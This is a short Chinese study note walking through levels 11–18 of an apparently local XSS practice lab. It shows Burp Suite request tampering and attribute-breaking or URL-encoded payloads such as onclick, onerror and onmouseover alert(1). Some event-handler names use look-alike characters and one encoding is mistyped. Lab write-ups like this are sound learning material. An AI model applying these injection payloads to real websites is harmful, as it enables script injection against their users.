本文为学习笔记,仅限学习交流
不得利用、从事危害国家或人民安全、荣誉和利益等活动
level11
查看源代码
尝试 利用BP抓包,改包
构造语句,注意闭合
level12
尝试BP抓包
改包: “ type=“test” οnclick=“alert(1)
放包。查看页面,操作成功。
level13
参照12题,尝试BP抓包,改包
改包:” type=“test” οnclick="alert(1)
level16
查看源代码
尝试构造语句:
尝试Url编码
在线编码转换:http://tool.oschina.net/encode?type=4
空格= %0a < = %3c > = %3E
http://127.0.0.1/xss/level16.php?keyword=test%20%3Cimg%0asrc=1%oaοnerrοr=alert%20(1)%0aοnclick=alert(1)%3E
level 17
查看源代码
http://127.0.0.1/xss/level17.php?arg01=a&arg02=b οnmοuseοver=alert(1)
level 18
http://127.0.0.1/xss/level18.php?arg01=a&arg02=b οnmοuseοver=alert(1)
